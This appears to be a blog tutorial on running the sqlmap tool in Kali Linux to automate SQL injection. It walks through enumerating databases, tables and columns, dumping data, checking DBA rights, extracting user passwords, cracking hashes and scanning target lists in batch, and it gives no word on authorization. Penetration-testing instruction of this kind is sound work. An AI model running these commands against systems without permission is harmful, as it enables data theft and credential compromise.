Linux Network Security Web

SQLmap – Exploit SQL injection – Kali Linux

According to OWASP, SQL injection is one of the top 10 most commonly found vulnerabilities in web applications. In this tutorial we are going to show you how you can automate SQL injection attack using the popular tool SQLmap. We are going to do this on a test site. GET method based SQL injection will be demonstrated using SQLmap in this tutorial. SQLmap also has capability to crack hashed password. SQLmap comes preinstalled in Kali Linux. If you are using another Linux distro like Debian, Ubuntu, or arch you can easily get it from the official repositories.

SQLmap is a terminal based application. So fire up your terminal and just type sqlmap to check if it is already installed.

Install SQLmap

Debian and Ubuntu based distros

#sudo apt-get install sqlmap

Arch based distros

#sudo pacman -Syy sqlmap

RedHat based distros

#sudo yum install sqlmap

Once SQLmap is installed then all you need is a vulnerable target to see its magic.

SQL injection using SQLmap

Basic command structure is very simple. First you write sqlmap and then URL followed by specific wildcards of where you want the injection to occur.

#sqlmap -u "url"

This command will perform SQL injection on the target and report back if specified target is vulnerable or not. Assuming that target is vulnerable, all the possible SQL injection attacks will be listed for that target. In order to render out some information, first you need to get the list of available databases available at target machine.

#sqlmap -u "url" --dbs

–dbs option here will enlist all the available databases on the target machine if the target is vulnerable to SQL injection. Once you get the list of your databases, the next step is to get the list of all the tables of selected database.

#sqlmap -u "url" --tables -D database-name.

here –table option is used to extract the list of all the tables in the selected database. -D option is used to specify the database name that you found out in the previous step. Next you need to enlist all the columns in the table.

#sqlmap -u "url" --columns -D database-name -T table-name 

Now –columns option will tell the sqlmap to get the name of all the columns and additional -T argument is used to specify the table name from which you want to enlist all the columns.

Once you get the columns’ name, either you can dump the whole columns’ data into csv file from the database or you can dump the data from selected fields.

#sqlmap -u "url" --dump -D database -name -T table-name 

Here this command will tell the sqlmap to dump all the data from the database-name where table table-name exists.

You can also dump the whole database by using following command

#sqlmap -u "url" --dump -D database-name.

Check if current user is a database administrator

To see if the current user has root access to the database management system, issue the following command.

#sqlmap -u "url" -o -b --current-user --is-dba

If current user turns out be a root user you can extract the password for that user and all the other users. Use the following command.

#sqlmap -u "url" -v1 --current-user --password

SQLmap on multiple target list.

sqlmap is a very flexible tool. You can give it any number of target in a text file and it will test all the targets on time.

#sqlmap -m "path-to-file" --batch 

here –batch option will process all the target with default options.
SQLmap also has password cracking capability. It can perform dictionary attack on the found hashes. Hash cracking process will take time according to your CPU power.

You can also find about other security testing tools here:

Best Vulnerability assessment tools and techniques

 

About the author

Ajay Verma

A Computer Science Graduate, who works extensively on open source projects. His Areas Of interest are: Network Security, Linux Administration, FOSS, Python, and C programming.

2 Comments

Click here to post a comment